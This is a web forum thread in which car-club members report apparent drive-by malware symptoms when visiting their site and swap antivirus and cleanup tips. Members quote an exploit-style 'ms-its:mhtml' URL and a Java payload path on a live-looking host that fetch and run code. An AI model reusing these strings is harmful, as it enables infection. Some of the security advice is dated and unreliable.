Last night when I opened vt5 it froze and my firewall detected: 'mshta.exe trying to make a connection'. I obviously didn't allow it and had to close internet explorer. I deleted the cookie and prefetch created by it and reconnected no problem. It did the same this morning and I wouldn't be too worried but the it happened on the missus' computer at work when she tried to access the site. Nortons didn't find anythin, nether has any of my spyware scanning software and the I.T bods at the missus' work id' it as a trojan. Anyone else found this. I managed to get on now by opening a saved favorite thread and logging on from it !

Yep same here. I got it too. See what J thinks, cos he may be on the case.

Adam.

Glad it's not just me !

Hmmm, this is the 3rd incident, hower, i can assure you there are no downloaders, popups, spyware etc attached to the site software, it cannot be hacked either.......

And judging by this its your pc's lads and lasses :(

http://www.nsclean.com/psc-htas.html

Removal here :

http://forum.theispguide.com/isp-ftopic3760.html

It will attach itself to the prefetch in your most opened IE applications, and run when they are launched, so we can see now who uses the site the most lol.

Don't know if this is just a fluke but if you open the site via your favorites list it messes up. I managed to get on by opening a saved page then logged in then opened the home page, deleted vt5 from my favorites list and resaved it. It seems to work ok now. Any chance it could be the favorites entry that has been infected ?

Well the IT bods you mentioned are wrong, it is actually a windows process, however when attaked by other trojans it activates in the way stated above, it could be attached to the cookie that is held for your favourites link, but deleting the link would not cure it.

Best thing to do is delete all cookies and temp internet files and just for good measure open command prompt and execute ipconfig /flushdns

Other than that i would make sure you have 100% up to date AV and firewall, a pop up blocker and spyware blaster or the like.

BTW, i can do a good deal on Anti Virus ;) lol

What is it with these people? Why would someone want to mess with ordinary home use PC's? I can understand those that hack into NATO's secrets or The Bank of England, but why infect Mr Smith or Mrs Jones and the kids. Sick Bastards the lot of 'em.

My computer went dodgy last night & today on this site! I had to shut it down and restart??

Whats the score?

Mac

Trojans..? Viruses..? http://www.volvot5.co.uk/forums/images/icons/icon12.gif

Hope its all resolved soon.

I have had my antivirus come up with a message of ..VBS:Malware [Gen]..
so I quarantined it and the file is called:-win32mhtplo-24(Trj) which is some sort of trojan.
Im using avast antivirus pro, and it only picks it up when I go to the forum page . :wtf:

It's very simple - they want to control your PC make it become a "zombie" to do a number of things primarily send spam and to be used in a distributed denial of service attack against a main target.

If you have a USB modem the average time to going onto the net and getting infected is down to just 12 minutes.

What can you do ?
Request a network / UTP modem from your ISP - you may have to pay but they are more secure.
Ensure you run windows update regularly.
Run virus scanners regularly and update your virus definitions daily
Run anti-spyware (adaware, spyware doctor and others) regularly.
Invest in a personal firewall - read the warnings it throws up.
Be careful about the attachments you run and save from email and untrusted websites.
backup your files to a non writeable source i.e. cdrom/dvd etc

It's a bad bad world out on the internet these days.

BTW, i can do a good deal on Anti Virus ;) lol
And there I was thinking AVG (http://www.grisoft.com/) is free :slap:

What is it with these people? Why would someone want to mess with ordinary home use PC's? I can understand those that hack into NATO's secrets or The Bank of England, but why infect Mr Smith or Mrs Jones and the kids. Sick Bastards the lot of 'em.

Noteriety is the main reason for all this kinda stuff. Dont know if you remember ( some will never forget the hassle it caused !!!) but the virus called ' I love You' which came in by e mail was a major headache....these type of guys want to be caught cos with their level of computer literacy they are very valuable to people like Mr Gates and his Microsoft job and you will find people like Mr ' I Love You ' virus working for Mr Gates for a VERY healthy sum and subsequent lifestyle!!!

Noteriety is the main reason for all this kinda stuff. Dont know if you remember ( some will never forget the hassle it caused !!!) but the virus called ' I love You' which came in by e mail was a major headache....these type of guys want to be caught cos with their level of computer literacy they are very valuable to people like Mr Gates and his Microsoft job and you will find people like Mr ' I Love You ' virus working for Mr Gates for a VERY healthy sum and subsequent lifestyle!!!

Traditionally viruses have been kids at home going for the Noteriety.... however more recently they've teamed up with organised crime (I Kid you not) and they are finding more and more ways to combine viruses and trojans in order to zombie machines for spam or denial of service (DOS/DDOS).

The later is often for blackmail - several UK companies have been on the end of these in the last year.

More recently the trend is to install key loggers to steal personal information - credit cards, passwords, secret question answers, bank details. It's a massive business these days and is growing very very fast.

Watch out boys and girls.

I'm running AVG and Zone Alarm Pro Firewall.
Nothing detected as yet, but since yesterday morning, Iwhen I log on, site (and pc) is very slow - java platform is activated (never happened when using this site before) and pc freezes for almost 5 mins???

And there I was thinking AVG (http://www.grisoft.com/) is free :slap:AVG is like having an umbrella instead of a roof, IMO :)

People, i will say it once more for the cheap seats, there is nothing on VF that would cause your machines to be infected.

AVG is like having an umbrella instead of a roof, IMO :)

People, i will say it once more for the cheap seats, there is nothing on VF that would case your machines to be infected.

No problem J.

Incidently, what would you recommend to replace my AVG umbrella?

Lol, no offence intended mate, just from personal experience its not too clever, there are loads on the market now as im sure you know, Norton is good enough for most but can be a pain if files get damaged, ie you cant uninstall or repair it, Panda is acclaimed to be good too, and cheapish, however Mr Cardwell is your man on this, i speak from a retail point of view, where as Andrew deals with this for a living :)

my pc has just started goin tits up the same and havnt a clue how to go about puttin it right

Yippee i`m trojan free norton internet security and antivirus do it for me :haha:

:remybussi

Cheers

stuart

AVG is like having an umbrella instead of a roof, IMO :)
Does that make windows the towel you mop the mess up with? :haha:

Never had a problem with AVG, providing it's kept up to date and used properly it's fine.

Windows isnt even that good mate, glad AVG works for you ;)

I've been having problems too, although it's O.K.this morning. I'll try to explain, but I'm pretty thick about computers. When I log onto the site, the page opens correctly but the 'hourglass' is there & none of the buttons will respond, also, I can't close the page. After a while, a box comes up
"cannot find file ://\\abcdefgabcdefgabcdefg (continues for several lines) make sure the path is correct". This box won't close. Then another box appears on top of it "do you want to instal & run 'ms-its:mhtml:file://C:\foo.mht!http://stats4all.ws/fa/4a04ClropOAw5A/x.chm::/load.exe" Eventually, after a while, it lets me say 'no' to this & then I can close the previous box too. The site then behaves normally. The whole thing takes about 10 minutes. This only happens on this site. Is this the same sort of thing as others are getting?
Cheers, Chris.

I'm no expert but Chris...sounds like you have a PC with a virus or ad/spyware.

I have absolutely no problems.
I run Mcafee firewall/virus scan
Microsoft anti spyware
Lavasoft Ad aware
Spybot Searc & Destroy
The last 3 are all free !!
Stop looking at dodgy websites all of you!! :)

I've been having problems too, although it's O.K.this morning. I'll try to explain, but I'm pretty thick about computers. When I log onto the site, the page opens correctly but the 'hourglass' is there & none of the buttons will respond, also, I can't close the page. After a while, a box comes up
"cannot find file ://\\abcdefgabcdefgabcdefg (continues for several lines) make sure the path is correct". This box won't close. Then another box appears on top of it "do you want to instal & run 'ms-its:mhtml:file://C:\foo.mht!http://stats4all.ws/fa/4a04ClropOAw5A/x.chm::/load.exe" Eventually, after a while, it lets me say 'no' to this & then I can close the previous box too. The site then behaves normally. The whole thing takes about 10 minutes. This only happens on this site. Is this the same sort of thing as others are getting?
Cheers, Chris.

Oh yes sounds like you got it bad
It would appear that the virus has infected the file that your pc uses to access the site and when the site sends back some info to your pc the virus kicks in and attempts to run (thats all the gobeldy gook your gettin on your screen)
Looks like your gonna have to get some antivirus software but you may need to turn off the windows xp system restore capability first otherwise the virus will just reinstall its self after youv`e used the anti virus software
The same applies to anyone else also havin problems as if you dont turn off the system restore your antivirus cannot scan the files that have been backed up ready for a restore and this is often where the virus is hiding

Oh forgot to mention System Restore is only available to Windows 2000 and XP users i think i know its not on Windows 98 or 98 se

Oh and don`t forget to run in safe mode while your doin all the above as that stops the virus from hiding or trying to access the web while your tryin to get rid of it

Cheers

stuart

Lol, no offence intended mate, just from personal experience its not too clever, there are loads on the market now as im sure you know, Norton is good enough for most but can be a pain if files get damaged, ie you cant uninstall or repair it, Panda is acclaimed to be good too, and cheapish, however Mr Cardwell is your man on this, i speak from a retail point of view, where as Andrew deals with this for a living :)

Thanks J :remybussi

I've been having problems too, although it's O.K.this morning. I'll try to explain, but I'm pretty thick about computers. When I log onto the site, the page opens correctly but the 'hourglass' is there & none of the buttons will respond, also, I can't close the page. After a while, the site then behaves normally. The whole thing takes about 10 minutes. This only happens on this site.

Same was happening to mine - again, pc/forum seems ok today. Zone Alarm Scans for ADware and Spyware Daily. I also used AdwareSE once a week, I have scanned with AVG twice this week now. Nothing has shown up. I'm puzzled.

In my experience, there are a few things you should use to help keep your system clean:-

A decent Anti Virus (keep it updated too).
Use AdAware - it's a freebie.
Use SpyBot - another freebie.
- What AdAware misses, SpyBot detects (and vice-versa).

Do a scan of your "Documents and Settings" folder - don't just rely on a "System" or "C:" scan as some programs seem to not do a thorough scan of this folder.

I've had plenty of experience of trojans / viruses / hijacks, so if you need any advice send me a PM or email.
(I'm away for the Bank Hol w/end, back Mon eve).

As already suggested somewhere else in the thread throw away your USB modems as they are dreadfull with zero security and get something like this below....IMO ISP's that supply customers with those USB devices should be shot.

http://www.ebuyer.com/customer/products/index.html?rb=10162352766&action=c2hvd19wcm9kdWN0X292ZXJ2aWV3&product_uid=63775

Yes this is one of the cheapest at £20ish (not one of the best but ok) easy to configure and will give you some extra MUST HAVE security in the form of a NAT firewall and as its not running Windows its not going to get hacked as easily as a windowz box will. There are loads of other devices similar to this one going up in price.

Also its worth running a second virus scan on your machine from time to time, I have Norton Antivirus 10 installed but also ocasionally visit http://uk.trendmicro-europe.com/index_consumer.php
and run thier Housecall which is a free virus scanner which is actually very good (all on-line). oh and a defo scan using AdAware or similar is also a must, although Norton 10 did pick up a few things that AdAware missed :/

Oh and if you really want to scare yourselves and see just how open to the internet you are try visiting http://grc.com/ and run through the security details and especially ShieldsUP try this with and without your NAT firewall or zone alarm etc and see what EVERYONE on the internet can see.

Mine has behaved normally today; no problems. Still never happened on any other site. From all the posts, it all seems too technical for me, so I'm just going to see how it goes. I've got Trend anti-virus which I update daily, also AdAware. Must get Spybot.
Cheers, Chris.

Not being funny but since I deleted my vt5 favorites entry and logged on to vt5 and re entered it into my favorites list I'm no longer having any problems ! Might be worth a try.

MattB, mine was exactly the same, java initialised and everything froze !

Not being funny but since I deleted my vt5 favorites entry and logged on to vt5 and re entered it into my favorites list I'm no longer having any problems ! Might be worth a try.

MattB, mine was exactly the same, java initialised and everything froze !

mmm - strange.
Mine's been ok in the last couple of days. I'll keep my eye on it though...

DAMMIT ! Did it again tonight, right after paying for something on ebay which was acting a bit strange and very slow which is a bit of a worry ! Right thats it, the whole lots goin' out the window :wallbash:

Im still gettting the VIRUS message when entering this site...strange.

Im running with norton internet security 2005 and i have had no problems so far.

Ran live update on Nortons 2005 and did system scan and it actually found something ! Deleted said thing but it still dropped a b*llock when I connected.

DAMMIT ! Did it again tonight, right after paying for something on ebay which was acting a bit strange and very slow which is a bit of a worry ! Right thats it, the whole lots goin' out the window :wallbash:

Java platform activated again today when I logged on to the site. (1st time since Friday). Did a system scan - nothing shown.

for the last few days when i call up the forum page i am redirected to here: http://www . atspace . com/domain_names_basics.html

i put the extra spaces in just incase.

i have run adaware plus i operate using zone alarm, no damage just hijacks my link, changed it and i t still does it. any ideas?

mine does the same , i use norton 2005,mcafee, carried out system scan several times o infections wtf? is it ,not much cop with pc,s. :slap:

Guys, there is so much crap on the net that does this to your pc its daft, they can get round AV software and get in in many ways, i would do several things.

Clear your cookies, if you dont know how ask, and delete all temp internet files, again ask. Then go here:

http://www.ravantivirus.com/scan/

I often use it in the shop to search for infected files on customer pc's, (as well as many other tricks) Use the link under the box that says

To continue without subscribing click here (http://www.ravantivirus.com/scan/indexie.php).

Then you will get a active x control to install, let it install and then click "SCAN MY PC"

This usually finds many that the others cant. If that doesnt do it i would back up all of your data and then format your drives, and when re installed "KEEP OFF THEM DODGY SITES" ;)

Somethings afoot, got an email today to my bt address. Ithad a welcome to Matt30462. This is the only place I use this identity.

GOB****ES

Is there a problem Matt ?

Minor hiccup Justin. SomeTurks have invited me to view Wendygetting her clothes off via webcam. Quite an entertaining concept but sadly on this occasion I must decline.
The email used my VT5 log-in, I only use it on here in the format they addressed it, so by my Sherlock Holme-like powers of deduction I suggest we have a PC nasty in our midst.
Just running NAV now and will clean cookies and temps.

Justin followed your advice mate and ran the antivirus and it found nowt ! visited other sites during day with no probs but as soon as i entered this site my pc froze and internet explorer encounted a problem and shut down ? i dont know what the hell is happening , i would add if i then reconnect and revisit the site all is well and i don't experience any probs , it only happens if i switch the pc off and then visit the site for the first time since reboot etc
any ideas???

Ok, i dont know what the virus or trojan is but it is obviously using the large amount of cookies that are stored to operate with.

Thats how when you log back in the site informs you of the number of new posts etc, all done by cookies, Matt, some of your cookie headers will be matt30462@volvot5 so it would assume your name is as above, all i can say guys is look at the processes that are running when it occurs using ctrl alt delete and click the processes tab at the top, any you dont know just type exactly what appears like sais.exe into google and see what it says, it will give you a full description of that executable and if you find a virus look at the removal process and protection for future.

Other than that i cant help you unless you bring me your machine, its that simple. Theres like 7 or 8 people that have this problem and 150 users a day are logging in, get your machines sorted.

Ran the scan yet again and found this little **** :

c:\windows\autoclk.exe-trojan:/killReg.d

Manually wiped it , rebooted and tried again , same bloody thing ! i,ll have another go tomorrow.... :dunce:

I don't care that much really.............took a peek at Emily's puppies and then wiped everything off the computer. Started from scratch with non of the usual crap and clutter. Laptop is going like a bloody rocket now. They can infect me every few months if they like, everytime I wipe it it gets quicker.

Emily who?

Zonealarm pops up 'mshta.exe trying to get a connection' when I try to enter the site through my favorites entry or by tapping in address. mshta.exe is apparently a legit windows application but can be hi-jacked for sinister means. Just for fun I allowed it once and it downloaded 'm00' application onto my desktop, no idea what it was but i've deleted it and I won't be doing that again ! Strangely enough if I connect to the 'weebl and bob' site from my favorites list then go to vf from there it's all ok !

Emily who?

Good point Goof. It was Wendy who wanted to show me her Turkish puppies........No wonder Emily got upset.

This is the message im getting from my antivirus...

http://stats4all.ws/fa/yQwW5YzvgM1L_A/proc.jar\PxB22C\Jvb.class

Think its a java script app...